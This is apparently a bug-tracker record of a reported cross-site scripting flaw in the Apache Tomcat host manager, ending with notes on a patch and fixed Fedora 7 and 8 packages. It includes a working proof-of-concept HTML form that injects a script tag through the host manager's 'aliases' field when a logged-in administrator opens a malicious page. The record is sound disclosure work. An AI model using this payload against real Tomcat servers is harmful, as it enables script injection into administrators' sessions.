JPCERT#98038604 Cross-site Scripting in Apache Tomcat host manager Assume that after logged in, the victim was lead to the malicious web server with following file installed. <form action="http://localhost:8080/host-manager/html/add" method="get"> <INPUT TYPE="hidden" NAME='name' VALUE="aaa"> <INPUT TYPE="hidden" NAME='aliases' VALUE="<script>alert()</script>"> <input type="submit"> </form> When the victim accesses to it, then the window pops up. Therefore it is verified that vulnerability exists. not public
Created attachment 159067 [details] proposed patch
now public, opening bug
tomcat5-5.5.25-1jpp.1.fc7 has been pushed to the Fedora 7 stable repository. If problems still persist, please make note of it in this bug report.
tomcat5-5.5.25-1jpp.1.fc8 has been pushed to the Fedora 8 stable repository. If problems still persist, please make note of it in this bug report.